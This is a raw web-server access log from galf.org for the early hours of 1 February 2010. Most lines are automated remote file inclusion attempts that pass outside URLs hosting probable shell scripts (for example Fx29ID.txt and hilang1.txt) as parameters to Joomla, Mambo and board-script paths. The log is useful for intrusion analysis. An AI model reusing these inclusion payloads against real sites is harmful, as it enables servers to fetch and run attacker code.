118.217.5.166 - - [01/Feb/2010:01:38:15 -0800] "GET /logs/access.log//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:39:48 -0800] "GET /logs/access.log//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:39:51 -0800] "GET /logs/access.log//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.158.155 - - [01/Feb/2010:01:40:35 -0800] "GET /logs/access.log/?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.122.158.155 - - [01/Feb/2010:01:40:35 -0800] "GET /?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
222.122.158.155 - - [01/Feb/2010:01:40:35 -0800] "GET /logs/?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "galf.org"
121.79.210.56 - - [01/Feb/2010:01:40:55 -0800] "GET /logs/ HTTP/1.1" 200 4942 "http://www.google.co.nz/search?hl=en&q=%3Fintitle%3Aindex.of%3F+logs&meta=&aq=f&oq=" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" "www.galf.org"
121.79.210.56 - - [01/Feb/2010:01:40:57 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" "www.galf.org"
121.79.210.56 - - [01/Feb/2010:01:40:58 -0800] "GET /logs/access.log HTTP/1.1" 200 251111 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" "www.galf.org"
85.17.203.198 - - [01/Feb/2010:01:42:51 -0800] "GET /index2.php?page=http://b2751661.justfree.com/lo.txt? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
85.17.203.198 - - [01/Feb/2010:01:42:51 -0800] "GET /logs/index2.php?page=http://b2751661.justfree.com/lo.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:46:01 -0800] "GET /logs/access_091228.log%20%20//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/ikhy1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:46:01 -0800] "GET /image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/ikhy1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:46:01 -0800] "GET /logs//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/ikhy1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:46:04 -0800] "GET /logs/access_091228.log%20%20//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/ikhy1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:46:04 -0800] "GET /image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/ikhy1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:46:04 -0800] "GET /logs//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/ikhy1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:46:05 -0800] "GET /image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/ikhy1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:46:05 -0800] "GET /logs/access_091228.log%20%20//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/ikhy1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:46:05 -0800] "GET /logs//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/ikhy1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.113.224 - - [01/Feb/2010:01:46:21 -0800] "GET /logs/access_090810.log HTTP/1.0" 200 4806214 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:01:47:00 -0800] "GET /logs/access_090720.log/index2.php?x=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:01:47:00 -0800] "GET /logs/index2.php?x=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:01:47:00 -0800] "GET /index2.php?x=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.203.198 - - [01/Feb/2010:01:47:00 -0800] "GET /index2.php?page=http://b2751661.justfree.com/lo.txt? HTTP/1.1" 404 - "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.galf.org"
85.17.203.198 - - [01/Feb/2010:01:47:00 -0800] "GET /logs/index2.php?page=http://b2751661.justfree.com/lo.txt? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:47:40 -0800] "GET /logs/access_091214.log%20%20//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/ikhy1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:47:41 -0800] "GET /logs/access_091214.log%20%20//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/ikhy1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:47:44 -0800] "GET /logs/access_091214.log%20%20//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/ikhy1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:01:47:55 -0800] "GET /index2.php?x=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:01:47:55 -0800] "GET /logs/access_090720.log/index2.php?x=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:01:47:55 -0800] "GET /logs/index2.php?x=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:49:53 -0800] "GET /logs//skin/ggambo7002_board/write.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:49:53 -0800] "GET /skin/ggambo7002_board/write.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:49:53 -0800] "GET /logs/access.log%20%20//skin/ggambo7002_board/write.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:50:12 -0800] "GET /skin/ggambo7002_board/write.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:50:12 -0800] "GET /logs/access.log%20%20//skin/ggambo7002_board/write.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:50:12 -0800] "GET /logs//skin/ggambo7002_board/write.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:50:18 -0800] "GET /logs/access.log%20%20//skin/ggambo7002_board/write.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:50:18 -0800] "GET /skin/ggambo7002_board/write.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:50:18 -0800] "GET /logs//skin/ggambo7002_board/write.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:50:18 -0800] "GET /skin/ggambo7002_board/write.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:50:18 -0800] "GET /logs/access.log%20%20//skin/ggambo7002_board/write.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:50:18 -0800] "GET /logs//skin/ggambo7002_board/write.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:01:52:19 -0800] "GET /logs/access_091102.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:01:52:19 -0800] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:01:52:20 -0800] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:01:53:07 -0800] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:01:53:07 -0800] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:01:53:08 -0800] "GET /logs/access_091026.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:01:53:12 -0800] "GET /logs/access_090914.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:53:28 -0800] "GET /logs/access_100125.log%20%20//skin/ggambo7002_board/write.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:01:53:45 -0800] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:01:53:45 -0800] "GET /logs/access_091102.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:01:53:45 -0800] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:01:53:46 -0800] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:01:53:46 -0800] "GET /logs/access_091102.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:01:53:46 -0800] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:53:47 -0800] "GET /logs/access_100125.log%20%20//skin/ggambo7002_board/write.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:01:53:48 -0800] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:01:53:49 -0800] "GET /logs/access_091102.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:01:53:49 -0800] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:53:59 -0800] "GET /logs/access_100125.log%20%20//skin/ggambo7002_board/write.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:54:02 -0800] "GET /logs/access_100125.log%20%20//skin/ggambo7002_board/write.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.28.184.15 - - [01/Feb/2010:01:55:14 -0800] "GET /logs/access_091102.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.28.184.15 - - [01/Feb/2010:01:55:14 -0800] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.28.184.15 - - [01/Feb/2010:01:55:14 -0800] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.28.184.15 - - [01/Feb/2010:01:55:27 -0800] "GET /logs/access_091102.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.28.184.15 - - [01/Feb/2010:01:55:27 -0800] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.28.184.15 - - [01/Feb/2010:01:55:28 -0800] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.28.184.15 - - [01/Feb/2010:01:56:46 -0800] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.28.184.15 - - [01/Feb/2010:01:56:46 -0800] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.28.184.15 - - [01/Feb/2010:01:56:46 -0800] "GET /logs/access_091026.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.28.184.15 - - [01/Feb/2010:01:56:46 -0800] "GET /logs/access_090914.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.28.184.15 - - [01/Feb/2010:01:56:57 -0800] "GET /logs/access_091026.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.28.184.15 - - [01/Feb/2010:01:56:57 -0800] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.28.184.15 - - [01/Feb/2010:01:56:57 -0800] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.28.184.15 - - [01/Feb/2010:01:56:57 -0800] "GET /logs/access_090914.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:01:59:21 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:01:59:21 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:01:59:21 -0800] "GET /logs/access_091221.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:01:59:28 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:01:59:28 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:01:59:28 -0800] "GET /logs/access_091221.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:01:59:28 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:01:59:28 -0800] "GET /logs/access_091221.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:01:59:28 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:01:59:34 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:01:59:34 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:01:59:34 -0800] "GET /logs/access_091221.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:01:59:56 -0800] "GET /logs///components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:01:59:56 -0800] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:01:59:57 -0800] "GET /logs/access_091102.log///components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:00:19 -0800] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:00:19 -0800] "GET /logs/access_091102.log///components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:00:19 -0800] "GET /logs///components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:00:20 -0800] "GET /logs///components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:00:20 -0800] "GET /logs/access_091102.log///components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:00:20 -0800] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:00:21 -0800] "GET /logs/access_091102.log///components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:00:21 -0800] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:00:21 -0800] "GET /logs///components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:02:00:57 -0800] "GET /logs/access_091026.log///components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:02:00:57 -0800] "GET /logs///components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:02:00:57 -0800] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:02:01:00 -0800] "GET /logs/access_090914.log///components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:02:06:16 -0800] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:02:06:16 -0800] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:02:06:17 -0800] "GET /logs/access_091102.log//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.193.131.164 - - [01/Feb/2010:02:07:05 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.193.131.164 - - [01/Feb/2010:02:07:05 -0800] "GET /logs/access_090720.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.193.131.164 - - [01/Feb/2010:02:07:05 -0800] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:02:07:11 -0800] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
